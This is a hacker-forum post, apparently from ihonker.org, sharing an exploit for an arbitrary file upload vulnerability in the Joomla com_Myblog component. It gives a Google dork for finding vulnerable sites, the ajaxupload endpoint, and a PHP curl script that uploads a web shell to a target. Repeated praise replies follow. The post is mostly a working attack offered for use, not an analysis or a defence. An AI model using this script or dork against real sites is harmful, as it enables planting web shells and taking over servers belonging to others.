Joomla com_Myblog Arbitrary文件上传漏洞
本帖最后由 90_ 于 2015-7-21 17:11 编辑[+] Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability
----------------------------------------------------
[+] Author: Back-DOOR
----------------------------------------------------
[+] Exploit by : Back-DOOR
[+] Dork google :inurl:/components/com_myblog/
----------------------------------------------------
[+] Contact:https://facebook.com/Backdoor.ma
[+] Like:https://fb.com/BaCkDoOr.HaCkInG
[+] youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos
exploit Vul : /index.php?option=com_myblog&task=ajaxupload
Vuln code : {error: 'No file has been uploaded.', msg: '' }
Exploiter :
***************************************************************************************************
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
*************************************************************************************************** 支持中国红客联盟(ihonker.org) 还是不错的哦,顶了 支持,看起来不错呢! 还是不错的哦,顶了 还是不错的哦,顶了 支持中国红客联盟(ihonker.org) 支持,看起来不错呢! 还是不错的哦,顶了 还是不错的哦,顶了